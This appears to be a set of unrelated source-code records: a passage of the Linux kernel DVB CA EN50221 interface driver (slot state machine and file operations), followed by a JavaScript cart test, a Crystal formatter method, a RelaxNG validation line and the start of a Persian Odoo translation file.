needed\n\t\t\t\tbreak;\n\n\t\t\tcase DVB_CA_SLOTSTATE_UNINITIALISED:\n\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_WAITREADY;\n\t\t\t\tca->pub->slot_reset(ca->pub, slot);\n\t\t\t\tca->slot_info[slot].timeout = jiffies + (INIT_TIMEOUT_SECS * HZ);\n\t\t\t\tbreak;\n\n\t\t\tcase DVB_CA_SLOTSTATE_WAITREADY:\n\t\t\t\tif (time_after(jiffies, ca->slot_info[slot].timeout)) {\n\t\t\t\t\tprintk(\"dvb_ca adaptor %d: PC card did not respond :(\\n\",\n\t\t\t\t\t ca->dvbdev->adapter->num);\n\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_INVALID;\n\t\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\t// no other action needed; will automatically change state when ready\n\t\t\t\tbreak;\n\n\t\t\tcase DVB_CA_SLOTSTATE_VALIDATE:\n\t\t\t\tif (dvb_ca_en50221_parse_attributes(ca, slot) != 0) {\n\t\t\t\t\t/* we need this extra check for annoying interfaces like the budget-av */\n\t\t\t\t\tif ((!(ca->flags & DVB_CA_EN50221_FLAG_IRQ_CAMCHANGE)) &&\n\t\t\t\t\t (ca->pub->poll_slot_status)) {\n\t\t\t\t\t\tstatus = ca->pub->poll_slot_status(ca->pub, slot, 0);\n\t\t\t\t\t\tif (!(status & DVB_CA_EN50221_POLL_CAM_PRESENT)) {\n\t\t\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_NONE;\n\t\t\t\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\tprintk(\"dvb_ca adapter %d: Invalid PC card inserted :(\\n\",\n\t\t\t\t\t ca->dvbdev->adapter->num);\n\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_INVALID;\n\t\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\tif (dvb_ca_en50221_set_configoption(ca, slot) != 0) {\n\t\t\t\t\tprintk(\"dvb_ca adapter %d: Unable to initialise CAM :(\\n\",\n\t\t\t\t\t ca->dvbdev->adapter->num);\n\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_INVALID;\n\t\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\tif (ca->pub->write_cam_control(ca->pub, slot,\n\t\t\t\t\t\t\t CTRLIF_COMMAND, CMDREG_RS) != 0) {\n\t\t\t\t\tprintk(\"dvb_ca adapter %d: Unable to reset CAM IF\\n\",\n\t\t\t\t\t ca->dvbdev->adapter->num);\n\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_INVALID;\n\t\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\tdprintk(\"DVB CAM validated successfully\\n\");\n\n\t\t\t\tca->slot_info[slot].timeout = jiffies + (INIT_TIMEOUT_SECS * HZ);\n\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_WAITFR;\n\t\t\t\tca->wakeup = 1;\n\t\t\t\tbreak;\n\n\t\t\tcase DVB_CA_SLOTSTATE_WAITFR:\n\t\t\t\tif (time_after(jiffies, ca->slot_info[slot].timeout)) {\n\t\t\t\t\tprintk(\"dvb_ca adapter %d: DVB CAM did not respond :(\\n\",\n\t\t\t\t\t ca->dvbdev->adapter->num);\n\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_INVALID;\n\t\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\n\t\t\t\tflags = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_STATUS);\n\t\t\t\tif (flags & STATUSREG_FR) {\n\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_LINKINIT;\n\t\t\t\t\tca->wakeup = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\n\t\t\tcase DVB_CA_SLOTSTATE_LINKINIT:\n\t\t\t\tif (dvb_ca_en50221_link_init(ca, slot) != 0) {\n\t\t\t\t\t/* we need this extra check for annoying interfaces like the budget-av */\n\t\t\t\t\tif ((!(ca->flags & DVB_CA_EN50221_FLAG_IRQ_CAMCHANGE)) &&\n\t\t\t\t\t (ca->pub->poll_slot_status)) {\n\t\t\t\t\t\tstatus = ca->pub->poll_slot_status(ca->pub, slot, 0);\n\t\t\t\t\t\tif (!(status & DVB_CA_EN50221_POLL_CAM_PRESENT)) {\n\t\t\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_NONE;\n\t\t\t\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\tprintk(\"dvb_ca adapter %d: DVB CAM link initialisation failed :(\\n\", ca->dvbdev->adapter->num);\n\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_INVALID;\n\t\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\n\t\t\t\tif (ca->slot_info[slot].rx_buffer.data == NULL) {\n\t\t\t\t\trxbuf = vmalloc(RX_BUFFER_SIZE);\n\t\t\t\t\tif (rxbuf == NULL) {\n\t\t\t\t\t\tprintk(\"dvb_ca adapter %d: Unable to allocate CAM rx buffer :(\\n\", ca->dvbdev->adapter->num);\n\t\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_INVALID;\n\t\t\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t\tdvb_ringbuffer_init(&ca->slot_info[slot].rx_buffer, rxbuf, RX_BUFFER_SIZE);\n\t\t\t\t}\n\n\t\t\t\tca->pub->slot_ts_enable(ca->pub, slot);\n\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_RUNNING;\n\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\tprintk(\"dvb_ca adapter %d: DVB CAM detected and initialised successfully\\n\", ca->dvbdev->adapter->num);\n\t\t\t\tbreak;\n\n\t\t\tcase DVB_CA_SLOTSTATE_RUNNING:\n\t\t\t\tif (!ca->open)\n\t\t\t\t\tbreak;\n\n\t\t\t\t// poll slots for data\n\t\t\t\tpktcount = 0;\n\t\t\t\twhile ((status = dvb_ca_en50221_read_data(ca, slot, NULL, 0)) > 0) {\n\t\t\t\t\tif (!ca->open)\n\t\t\t\t\t\tbreak;\n\n\t\t\t\t\t/* if a CAMCHANGE occurred at some point, do not do any more processing of this slot */\n\t\t\t\t\tif (dvb_ca_en50221_check_camstatus(ca, slot)) {\n\t\t\t\t\t\t// we dont want to sleep on the next iteration so we can handle the cam change\n\t\t\t\t\t\tca->wakeup = 1;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\n\t\t\t\t\t/* check if we've hit our limit this time */\n\t\t\t\t\tif (++pktcount >= MAX_RX_PACKETS_PER_ITERATION) {\n\t\t\t\t\t\t// dont sleep; there is likely to be more data to read\n\t\t\t\t\t\tca->wakeup = 1;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\t}\n\n\t\t\tmutex_unlock(&ca->slot_info[slot].slot_lock);\n\t\t}\n\t}\n\n\treturn 0;\n}\n\n\n\n/* ******************************************************************************** */\n/* EN50221 IO interface functions */\n\n/**\n * Real ioctl implementation.\n * NOTE: CA_SEND_MSG/CA_GET_MSG ioctls have userspace buffers passed to them.\n *\n * @inode: Inode concerned.\n * @file: File concerned.\n * @cmd: IOCTL command.\n * @arg: Associated argument.\n *\n * @return 0 on success, <0 on error.\n */\nstatic int dvb_ca_en50221_io_do_ioctl(struct file *file,\n\t\t\t\t unsigned int cmd, void *parg)\n{\n\tstruct dvb_device *dvbdev = file->private_data;\n\tstruct dvb_ca_private *ca = dvbdev->priv;\n\tint err = 0;\n\tint slot;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\tif (mutex_lock_interruptible(&ca->ioctl_mutex))\n\t\treturn -ERESTARTSYS;\n\n\tswitch (cmd) {\n\tcase CA_RESET:\n\t\tfor (slot = 0; slot < ca->slot_count; slot++) {\n\t\t\tmutex_lock(&ca->slot_info[slot].slot_lock);\n\t\t\tif (ca->slot_info[slot].slot_state != DVB_CA_SLOTSTATE_NONE) {\n\t\t\t\tdvb_ca_en50221_slot_shutdown(ca, slot);\n\t\t\t\tif (ca->flags & DVB_CA_EN50221_FLAG_IRQ_CAMCHANGE)\n\t\t\t\t\tdvb_ca_en50221_camchange_irq(ca->pub,\n\t\t\t\t\t\t\t\t slot,\n\t\t\t\t\t\t\t\t DVB_CA_EN50221_CAMCHANGE_INSERTED);\n\t\t\t}\n\t\t\tmutex_unlock(&ca->slot_info[slot].slot_lock);\n\t\t}\n\t\tca->next_read_slot = 0;\n\t\tdvb_ca_en50221_thread_wakeup(ca);\n\t\tbreak;\n\n\tcase CA_GET_CAP: {\n\t\tstruct ca_caps *caps = parg;\n\n\t\tcaps->slot_num = ca->slot_count;\n\t\tcaps->slot_type = CA_CI_LINK;\n\t\tcaps->descr_num = 0;\n\t\tcaps->descr_type = 0;\n\t\tbreak;\n\t}\n\n\tcase CA_GET_SLOT_INFO: {\n\t\tstruct ca_slot_info *info = parg;\n\n\t\tif ((info->num > ca->slot_count) || (info->num < 0)) {\n\t\t\terr = -EINVAL;\n\t\t\tgoto out_unlock;\n\t\t}\n\n\t\tinfo->type = CA_CI_LINK;\n\t\tinfo->flags = 0;\n\t\tif ((ca->slot_info[info->num].slot_state != DVB_CA_SLOTSTATE_NONE)\n\t\t\t&& (ca->slot_info[info->num].slot_state != DVB_CA_SLOTSTATE_INVALID)) {\n\t\t\tinfo->flags = CA_CI_MODULE_PRESENT;\n\t\t}\n\t\tif (ca->slot_info[info->num].slot_state == DVB_CA_SLOTSTATE_RUNNING) {\n\t\t\tinfo->flags |= CA_CI_MODULE_READY;\n\t\t}\n\t\tbreak;\n\t}\n\n\tdefault:\n\t\terr = -EINVAL;\n\t\tbreak;\n\t}\n\nout_unlock:\n\tmutex_unlock(&ca->ioctl_mutex);\n\treturn err;\n}\n\n\n/**\n * Wrapper for ioctl implementation.\n *\n * @inode: Inode concerned.\n * @file: File concerned.\n * @cmd: IOCTL command.\n * @arg: Associated argument.\n *\n * @return 0 on success, <0 on error.\n */\nstatic long dvb_ca_en50221_io_ioctl(struct file *file,\n\t\t\t\t unsigned int cmd, unsigned long arg)\n{\n\treturn dvb_usercopy(file, cmd, arg, dvb_ca_en50221_io_do_ioctl);\n}\n\n\n/**\n * Implementation of write() syscall.\n *\n * @file: File structure.\n * @buf: Source buffer.\n * @count: Size of source buffer.\n * @ppos: Position in file (ignored).\n *\n * @return Number of bytes read, or <0 on error.\n */\nstatic ssize_t dvb_ca_en50221_io_write(struct file *file,\n\t\t\t\t const char __user * buf, size_t count, loff_t * ppos)\n{\n\tstruct dvb_device *dvbdev = file->private_data;\n\tstruct dvb_ca_private *ca = dvbdev->priv;\n\tu8 slot, connection_id;\n\tint status;\n\tu8 fragbuf[HOST_LINK_BUF_SIZE];\n\tint fragpos = 0;\n\tint fraglen;\n\tunsigned long timeout;\n\tint written;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\t/* Incoming packet has a 2 byte header. hdr[0] = slot_id, hdr[1] = connection_id */\n\tif (count < 2)\n\t\treturn -EINVAL;\n\n\t/* extract slot & connection id */\n\tif (copy_from_user(&slot, buf, 1))\n\t\treturn -EFAULT;\n\tif (copy_from_user(&connection_id, buf + 1, 1))\n\t\treturn -EFAULT;\n\tbuf += 2;\n\tcount -= 2;\n\n\t/* check if the slot is actually running */\n\tif (ca->slot_info[slot].slot_state != DVB_CA_SLOTSTATE_RUNNING)\n\t\treturn -EINVAL;\n\n\t/* fragment the packets & store in the buffer */\n\twhile (fragpos < count) {\n\t\tfraglen = ca->slot_info[slot].link_buf_size - 2;\n\t\tif (fraglen < 0)\n\t\t\tbreak;\n\t\tif (fraglen > HOST_LINK_BUF_SIZE - 2)\n\t\t\tfraglen = HOST_LINK_BUF_SIZE - 2;\n\t\tif ((count - fragpos) < fraglen)\n\t\t\tfraglen = count - fragpos;\n\n\t\tfragbuf[0] = connection_id;\n\t\tfragbuf[1] = ((fragpos + fraglen) < count) ? 0x80 : 0x00;\n\t\tstatus = copy_from_user(fragbuf + 2, buf + fragpos, fraglen);\n\t\tif (status) {\n\t\t\tstatus = -EFAULT;\n\t\t\tgoto exit;\n\t\t}\n\n\t\ttimeout = jiffies + HZ / 2;\n\t\twritten = 0;\n\t\twhile (!time_after(jiffies, timeout)) {\n\t\t\t/* check the CAM hasn't been removed/reset in the meantime */\n\t\t\tif (ca->slot_info[slot].slot_state != DVB_CA_SLOTSTATE_RUNNING) {\n\t\t\t\tstatus = -EIO;\n\t\t\t\tgoto exit;\n\t\t\t}\n\n\t\t\tmutex_lock(&ca->slot_info[slot].slot_lock);\n\t\t\tstatus = dvb_ca_en50221_write_data(ca, slot, fragbuf, fraglen + 2);\n\t\t\tmutex_unlock(&ca->slot_info[slot].slot_lock);\n\t\t\tif (status == (fraglen + 2)) {\n\t\t\t\twritten = 1;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\tif (status != -EAGAIN)\n\t\t\t\tgoto exit;\n\n\t\t\tmsleep(1);\n\t\t}\n\t\tif (!written) {\n\t\t\tstatus = -EIO;\n\t\t\tgoto exit;\n\t\t}\n\n\t\tfragpos += fraglen;\n\t}\n\tstatus = count + 2;\n\nexit:\n\treturn status;\n}\n\n\n/**\n * Condition for waking up in dvb_ca_en50221_io_read_condition\n */\nstatic int dvb_ca_en50221_io_read_condition(struct dvb_ca_private *ca,\n\t\t\t\t\t int *result, int *_slot)\n{\n\tint slot;\n\tint slot_count = 0;\n\tint idx;\n\tsize_t fraglen;\n\tint connection_id = -1;\n\tint found = 0;\n\tu8 hdr[2];\n\n\tslot = ca->next_read_slot;\n\twhile ((slot_count < ca->slot_count) && (!found)) {\n\t\tif (ca->slot_info[slot].slot_state != DVB_CA_SLOTSTATE_RUNNING)\n\t\t\tgoto nextslot;\n\n\t\tif (ca->slot_info[slot].rx_buffer.data == NULL) {\n\t\t\treturn 0;\n\t\t}\n\n\t\tidx = dvb_ringbuffer_pkt_next(&ca->slot_info[slot].rx_buffer, -1, &fraglen);\n\t\twhile (idx != -1) {\n\t\t\tdvb_ringbuffer_pkt_read(&ca->slot_info[slot].rx_buffer, idx, 0, hdr, 2);\n\t\t\tif (connection_id == -1)\n\t\t\t\tconnection_id = hdr[0];\n\t\t\tif ((hdr[0] == connection_id) && ((hdr[1] & 0x80) == 0)) {\n\t\t\t\t*_slot = slot;\n\t\t\t\tfound = 1;\n\t\t\t\tbreak;\n\t\t\t}\n\n\t\t\tidx = dvb_ringbuffer_pkt_next(&ca->slot_info[slot].rx_buffer, idx, &fraglen);\n\t\t}\n\nnextslot:\n\t\tslot = (slot + 1) % ca->slot_count;\n\t\tslot_count++;\n\t}\n\n\tca->next_read_slot = slot;\n\treturn found;\n}\n\n\n/**\n * Implementation of read() syscall.\n *\n * @file: File structure.\n * @buf: Destination buffer.\n * @count: Size of destination buffer.\n * @ppos: Position in file (ignored).\n *\n * @return Number of bytes read, or <0 on error.\n */\nstatic ssize_t dvb_ca_en50221_io_read(struct file *file, char __user * buf,\n\t\t\t\t size_t count, loff_t * ppos)\n{\n\tstruct dvb_device *dvbdev = file->private_data;\n\tstruct dvb_ca_private *ca = dvbdev->priv;\n\tint status;\n\tint result = 0;\n\tu8 hdr[2];\n\tint slot;\n\tint connection_id = -1;\n\tsize_t idx, idx2;\n\tint last_fragment = 0;\n\tsize_t fraglen;\n\tint pktlen;\n\tint dispose = 0;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\t/* Outgoing packet has a 2 byte header. hdr[0] = slot_id, hdr[1] = connection_id */\n\tif (count < 2)\n\t\treturn -EINVAL;\n\n\t/* wait for some data */\n\tif ((status = dvb_ca_en50221_io_read_condition(ca, &result, &slot)) == 0) {\n\n\t\t/* if we're in nonblocking mode, exit immediately */\n\t\tif (file->f_flags & O_NONBLOCK)\n\t\t\treturn -EWOULDBLOCK;\n\n\t\t/* wait for some data */\n\t\tstatus = wait_event_interruptible(ca->wait_queue,\n\t\t\t\t\t\t dvb_ca_en50221_io_read_condition\n\t\t\t\t\t\t (ca, &result, &slot));\n\t}\n\tif ((status < 0) || (result < 0)) {\n\t\tif (result)\n\t\t\treturn result;\n\t\treturn status;\n\t}\n\n\tidx = dvb_ringbuffer_pkt_next(&ca->slot_info[slot].rx_buffer, -1, &fraglen);\n\tpktlen = 2;\n\tdo {\n\t\tif (idx == -1) {\n\t\t\tprintk(\"dvb_ca adapter %d: BUG: read packet ended before last_fragment encountered\\n\", ca->dvbdev->adapter->num);\n\t\t\tstatus = -EIO;\n\t\t\tgoto exit;\n\t\t}\n\n\t\tdvb_ringbuffer_pkt_read(&ca->slot_info[slot].rx_buffer, idx, 0, hdr, 2);\n\t\tif (connection_id == -1)\n\t\t\tconnection_id = hdr[0];\n\t\tif (hdr[0] == connection_id) {\n\t\t\tif (pktlen < count) {\n\t\t\t\tif ((pktlen + fraglen - 2) > count) {\n\t\t\t\t\tfraglen = count - pktlen;\n\t\t\t\t} else {\n\t\t\t\t\tfraglen -= 2;\n\t\t\t\t}\n\n\t\t\t\tif ((status = dvb_ringbuffer_pkt_read_user(&ca->slot_info[slot].rx_buffer, idx, 2,\n\t\t\t\t\t\t\t\t buf + pktlen, fraglen)) < 0) {\n\t\t\t\t\tgoto exit;\n\t\t\t\t}\n\t\t\t\tpktlen += fraglen;\n\t\t\t}\n\n\t\t\tif ((hdr[1] & 0x80) == 0)\n\t\t\t\tlast_fragment = 1;\n\t\t\tdispose = 1;\n\t\t}\n\n\t\tidx2 = dvb_ringbuffer_pkt_next(&ca->slot_info[slot].rx_buffer, idx, &fraglen);\n\t\tif (dispose)\n\t\t\tdvb_ringbuffer_pkt_dispose(&ca->slot_info[slot].rx_buffer, idx);\n\t\tidx = idx2;\n\t\tdispose = 0;\n\t} while (!last_fragment);\n\n\thdr[0] = slot;\n\thdr[1] = connection_id;\n\tstatus = copy_to_user(buf, hdr, 2);\n\tif (status) {\n\t\tstatus = -EFAULT;\n\t\tgoto exit;\n\t}\n\tstatus = pktlen;\n\nexit:\n\treturn status;\n}\n\n\n/**\n * Implementation of file open syscall.\n *\n * @inode: Inode concerned.\n * @file: File concerned.\n *\n * @return 0 on success, <0 on failure.\n */\nstatic int dvb_ca_en50221_io_open(struct inode *inode, struct file *file)\n{\n\tstruct dvb_device *dvbdev = file->private_data;\n\tstruct dvb_ca_private *ca = dvbdev->priv;\n\tint err;\n\tint i;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\tif (!try_module_get(ca->pub->owner))\n\t\treturn -EIO;\n\n\terr = dvb_generic_open(inode, file);\n\tif (err < 0) {\n\t\tmodule_put(ca->pub->owner);\n\t\treturn err;\n\t}\n\n\tfor (i = 0; i < ca->slot_count; i++) {\n\n\t\tif (ca->slot_info[i].slot_state == DVB_CA_SLOTSTATE_RUNNING) {\n\t\t\tif (ca->slot_info[i].rx_buffer.data != NULL) {\n\t\t\t\t/* it is safe to call this here without locks because\n\t\t\t\t * ca->open == 0. Data is not read in this case */\n\t\t\t\tdvb_ringbuffer_flush(&ca->slot_info[i].rx_buffer);\n\t\t\t}\n\t\t}\n\t}\n\n\tca->open = 1;\n\tdvb_ca_en50221_thread_update_delay(ca);\n\tdvb_ca_en50221_thread_wakeup(ca);\n\n\treturn 0;\n}\n\n\n/**\n * Implementation of file close syscall.\n *\n * @inode: Inode concerned.\n * @file: File concerned.\n *\n * @return 0 on success, <0 on failure.\n */\nstatic int dvb_ca_en50221_io_release(struct inode *inode, struct file *file)\n{\n\tstruct dvb_device *dvbdev = file->private_data;\n\tstruct dvb_ca_private *ca = dvbdev->priv;\n\tint err;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\t/* mark the CA device as closed */\n\tca->open = 0;\n\tdvb_ca_en50221_thread_update_delay(ca);\n\n\terr = dvb_generic_release(inode, file);\n\n\tmodule_put(ca->pub->owner);\n\n\treturn err;\n}\n\n\n/**\n * Implementation of poll() syscall.\n *\n * @file: File concerned.\n * @wait: poll wait table.\n *\n * @return Standard poll mask.\n */\nstatic unsigned int dvb_ca_en50221_io_poll(struct file *file, poll_table * wait)\n{\n\tstruct dvb_device *dvbdev = file->private_data;\n\tstruct dvb_ca_private *ca = dvbdev->priv;\n\tunsigned int mask = 0;\n\tint slot;\n\tint result = 0;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\tif (dvb_ca_en50221_io_read_condition(ca, &result, &slot) == 1) {\n\t\tmask |= POLLIN;\n\t}\n\n\t/* if there is something, return now */\n\tif (mask)\n\t\treturn mask;\n\n\t/* wait for something to happen */\n\tpoll_wait(file, &ca->wait_queue, wait);\n\n\tif (dvb_ca_en50221_io_read_condition(ca, &result, &slot) == 1) {\n\t\tmask |= POLLIN;\n\t}\n\n\treturn mask;\n}\nEXPORT_SYMBOL(dvb_ca_en50221_init);\n\n\nstatic const struct file_operations dvb_ca_fops = {\n\t.owner = THIS_MODULE,\n\t.read = dvb_ca_en50221_io_read,\n\t.write = dvb_ca_en50221_io_write,\n\t.unlocked_ioctl = dvb_ca_en50221_io_ioctl,\n\t.open = dvb_ca_en50221_io_open,\n\t.release = dvb_ca_en50221_io_release,\n\t.poll = dvb_ca_en50221_io_poll,\n\t.llseek = noop_llseek,\n};\n\nstatic const struct dvb_device dvbdev_ca = {\n\t.priv = NULL,\n\t.users = 1,\n\t.readers = 1,\n\t.writers = 1,\n#if defined(CONFIG_MEDIA_CONTROLLER_DVB)\n\t.name = \"dvb-ca-en50221\",\n#endif\n\t.fops = &dvb_ca_fops,\n};\n\n/* ******************************************************************************** */\n/* Initialisation/shutdown functions */\n\n\n/**\n * Initialise a new DVB CA EN50221 interface device.\n *\n * @dvb_adapter: DVB adapter to attach the new CA device to.\n * @ca: The dvb_ca instance.\n * @flags: Flags describing the CA device (DVB_CA_FLAG_*).\n * @slot_count: Number of slots supported.\n *\n * @return 0 on success, nonzero on failure\n */\nint dvb_ca_en50221_init(struct dvb_adapter *dvb_adapter,\n\t\t\tstruct dvb_ca_en50221 *pubca, int flags, int slot_count)\n{\n\tint ret;\n\tstruct dvb_ca_private *ca = NULL;\n\tint i;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\tif (slot_count < 1)\n\t\treturn -EINVAL;\n\n\t/* initialise the system data */\n\tif ((ca = kzalloc(sizeof(struct dvb_ca_private), GFP_KERNEL)) == NULL) {\n\t\tret = -ENOMEM;\n\t\tgoto exit;\n\t}\n\tca->pub = pubca;\n\tca->flags = flags;\n\tca->slot_count = slot_count;\n\tif ((ca->slot_info = kcalloc(slot_count, sizeof(struct dvb_ca_slot), GFP_KERNEL)) == NULL) {\n\t\tret = -ENOMEM;\n\t\tgoto free_ca;\n\t}\n\tinit_waitqueue_head(&ca->wait_queue);\n\tca->open = 0;\n\tca->wakeup = 0;\n\tca->next_read_slot = 0;\n\tpubca->private = ca;\n\n\t/* register the DVB device */\n\tret = dvb_register_device(dvb_adapter, &ca->dvbdev, &dvbdev_ca, ca, DVB_DEVICE_CA);\n\tif (ret)\n\t\tgoto free_slot_info;\n\n\t/* now initialise each slot */\n\tfor (i = 0; i < slot_count; i++) {\n\t\tmemset(&ca->slot_info[i], 0, sizeof(struct dvb_ca_slot));\n\t\tca->slot_info[i].slot_state = DVB_CA_SLOTSTATE_NONE;\n\t\tatomic_set(&ca->slot_info[i].camchange_count, 0);\n\t\tca->slot_info[i].camchange_type = DVB_CA_EN50221_CAMCHANGE_REMOVED;\n\t\tmutex_init(&ca->slot_info[i].slot_lock);\n\t}\n\n\tmutex_init(&ca->ioctl_mutex);\n\n\tif (signal_pending(current)) {\n\t\tret = -EINTR;\n\t\tgoto unregister_device;\n\t}\n\tmb();\n\n\t/* create a kthread for monitoring this CA device */\n\tca->thread = kthread_run(dvb_ca_en50221_thread, ca, \"kdvb-ca-%i:%i\",\n\t\t\t\t ca->dvbdev->adapter->num, ca->dvbdev->id);\n\tif (IS_ERR(ca->thread)) {\n\t\tret = PTR_ERR(ca->thread);\n\t\tprintk(\"dvb_ca_init: failed to start kernel_thread (%d)\\n\",\n\t\t\tret);\n\t\tgoto unregister_device;\n\t}\n\treturn 0;\n\nunregister_device:\n\tdvb_unregister_device(ca->dvbdev);\nfree_slot_info:\n\tkfree(ca->slot_info);\nfree_ca:\n\tkfree(ca);\nexit:\n\tpubca->private = NULL;\n\treturn ret;\n}\nEXPORT_SYMBOL(dvb_ca_en50221_release);\n\n\n\n/**\n * Release a DVB CA EN50221 interface device.\n *\n * @ca_dev: The dvb_device_t instance for the CA device.\n * @ca: The associated dvb_ca instance.\n */\nvoid dvb_ca_en50221_release(struct dvb_ca_en50221 *pubca)\n{\n\tstruct dvb_ca_private *ca = pubca->private;\n\tint i;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\t/* shutdown the thread if there was one */\n\tkthread_stop(ca->thread);\n\n\tfor (i = 0; i < ca->slot_count; i++) {\n\t\tdvb_ca_en50221_slot_shutdown(ca, i);\n\t\tvfree(ca->slot_info[i].rx_buffer.data);\n\t}\n\tkfree(ca->slot_info);\n\tdvb_unregister_device(ca->dvbdev);\n\tkfree(ca);\n\tpubca->private = NULL;\n}\n"} {"text": "import createShippingInfoData from './../../../helpers/createShippingInfoData';\n\ndescribe('Cart createShippingInfoData', () => {\n it('returns methods data', async () => {\n const methodsData = {\n country: 'UK',\n carrier_code: 'XX',\n method_code: 'YY'\n };\n const shippingInfoData = createShippingInfoData(methodsData);\n expect(shippingInfoData).toEqual({\n billingAddress: {},\n shippingAddress: {\n countryId: 'UK'\n },\n shippingCarrierCode: 'XX',\n shippingMethodCode: 'YY'\n });\n });\n\n it('returns methods data with shipping address', async () => {\n const methodsData = {\n country: 'UK',\n carrier_code: 'XX',\n method_code: 'YY',\n shippingAddress: {\n city: 'London',\n firstname: 'John',\n lastname: 'Doe',\n postcode: 'EC123',\n street: ['JohnDoe street']\n }\n };\n const shippingInfoData = createShippingInfoData(methodsData);\n expect(shippingInfoData).toEqual({\n billingAddress: {},\n shippingAddress: {\n city: 'London',\n countryId: 'UK',\n firstname: 'John',\n lastname: 'Doe',\n postcode: 'EC123',\n street: ['JohnDoe street']\n },\n shippingCarrierCode: 'XX',\n shippingMethodCode: 'YY'\n });\n });\n\n it('returns methods data with billing address', async () => {\n const methodsData = {\n country: 'UK',\n carrier_code: 'XX',\n method_code: 'YY',\n billingAddress: {\n city: 'London',\n countryId: 'UK',\n firstname: 'John',\n lastname: 'Doe',\n postcode: 'EC123',\n street: ['JohnDoe street']\n }\n };\n const shippingInfoData = createShippingInfoData(methodsData);\n expect(shippingInfoData).toEqual({\n shippingAddress: { countryId: 'UK' },\n billingAddress: {\n city: 'London',\n countryId: 'UK',\n firstname: 'John',\n lastname: 'Doe',\n postcode: 'EC123',\n street: ['JohnDoe street']\n },\n shippingCarrierCode: 'XX',\n shippingMethodCode: 'YY'\n });\n });\n\n it('doesn\\t add shippingCarrierCode or shippingMethodCode if missing carrier_code or method_code', async () => {\n const methodsData = {\n country: 'UK'\n };\n const shippingInfoData = createShippingInfoData(methodsData);\n expect(shippingInfoData).toEqual({\n billingAddress: {},\n shippingAddress: {\n countryId: 'UK'\n }\n });\n });\n});\n"} {"text": "module Mint\n class Formatter\n def format(node : Ast::ArrayAccess) : String\n index =\n case node.index\n when Int64\n node.index\n else\n format node.index.as(Ast::Expression)\n end\n\n lhs =\n format node.lhs\n\n \"#{lhs}[#{index}]\"\n end\n end\nend\n"} {"text": "./test/relaxng/tutor13_1_1.xml validates\n"} {"text": "# Translation of Odoo Server.\n# This file contains the translation of the following modules:\n# \t* phone_validation\n# \n# Translators:\n# Zahed Alfak , 2020\n# Martin Trigaux, 2020\n# Morovat Guivi , 2020\n# Hamid Darabi, 2020\n# Hamed Mohammadi , 2020\n# Hamid Reza Kaveh , 2020\n# \nmsgid \"\"\nmsgstr \"\"\n\"Project-Id-Version: Odoo Server saas~12.5\\n\"\n\"Report-Msgid-Bugs-To: \\n\"\n\"POT-Creation-Date: 2019-09-13 11:29+0000\\n\"\n\"PO-Revision-Date: 2019-08-26 09:12+0000\\n\"\n\"Last-Translator: Hamid Reza Kaveh , 2020\\n\"\n\"Language-Team: Persian (https://www.transifex.com/odoo/teams/41243/fa/)\\n\"\n\"MIME-Version: 1.0\\n\"\n\"Content-Type: text/plain; charset=UTF-8\\n\"\n\"Content-Transfer-Encoding: \\n\"\n\"Language: fa\\n\"\n\"Plural-Forms: nplurals=2; plural=(n > 1);\\n\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_needaction\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_needaction\nmsgid \"Action Needed\"\nmsgstr \"اقدام مورد نیاز است\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__active\nmsgid \"Active\"\nmsgstr \"فعال\"\n\n#. module: phone_validation\n#: 